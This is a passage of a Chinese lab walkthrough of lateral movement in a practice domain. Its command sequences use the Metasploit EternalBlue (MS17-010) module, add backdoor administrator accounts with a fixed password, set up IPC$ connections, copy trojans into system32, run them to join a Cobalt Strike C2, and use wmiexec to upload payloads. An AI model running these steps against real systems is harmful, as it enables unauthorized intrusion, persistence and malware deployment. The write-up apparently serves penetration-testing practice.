2)永恒之蓝+wmiexec上线CS
(1)建立中转监听
image-20210817005034203
(2)生成32位和64位的木马
64.exe和32.exe
image-20210819004815677
image-20210819004824797
(3)msfconsole设置代理
setg Proxies socks5:10.0.1.12:11668 setg ReverseAllowProxy true
image-20210818220154657
(4)使用ms17-010模块进行攻击
msf6 > search ms17-010 msf6 > use 0
image-20210818220254292
msf6 auxiliary(admin/smb/ms17_010_command) > set RHOSTS 192.168.52.138 RHOSTS => 192.168.52.138 msf6 auxiliary(admin/smb/ms17_010_command) > set COMMAND ipconfig COMMAND => ipconfig msf6 auxiliary(admin/smb/ms17_010_command) > run
image-20210818220502516
创建管理员组用户
net user ch4nge QWEasd123 /add net localgroup Administrators ch4nge /add net user ch4nge
image-20210818233503646
image-20210818233539854
image-20210818233610709
(5)192.168.52.141建立管理员组用户
net user ch4nge QWEasd123 /add net localgroup Administrators ch4nge /add net user ch4nge
image-20210818234502256
image-20210818234548125
image-20210818234638222
(6)建立IPC
然后使用CS的会话建立IPC
net use \\192.168.52.138\ipc$ "QWEasd123" /user:ch4nge net use \\192.168.52.141\ipc$ "QWEasd123" /user:ch4nge 删除IPC方法 net use \\192.168.52.141 /del /y
image-20210818234838829
192.168.52.141建立IPC成功,但是不能使用dir列C盘目录,使用域管理员用户才有权限,好家伙,先上线域控再说
copy马过去,永恒之蓝去执行.永恒之蓝执行命令的当前路径是C:\windows\system32\
直接copy到这个路径
copy 64.exe \\192.168.52.138\c$\windows\system32\
image-20210819001353398
执行木马,上线CS
msf6 auxiliary(admin/smb/ms17_010_command) > set rhosts 192.168.52.138 rhosts => 192.168.52.138 msf6 auxiliary(admin/smb/ms17_010_command) > set COMMAND 64.exe COMMAND => 64.exe msf6 auxiliary(admin/smb/ms17_010_command) > run
image-20210819001515464
(7)通过隧道使用wmiexec连接获取shell
windows版本的wmiexec好用
当然啦,域控也可以这样上线
wmiexec.exe ch4nge:QWEasd123@192.168.52.141 put 32.exe
image-20210819004521782
注意192.168.52.141是win2003,是32位系统,木马要生成32位的
image-20210819004556704
image-20210819005346701
总结
在打此靶场遇到一些问题总结如下
1.靶机中的域信任关系,域控可以直接dir 该域普通用户
2.域普通用户A对域普通用户B进行IPC的时候,要用B的域管理员用户才可以,本地管理员用户不可以;wmiexec使用B的本地用户和域管理员用户都可以连接
3.用wmiexec连接已知密码的靶机
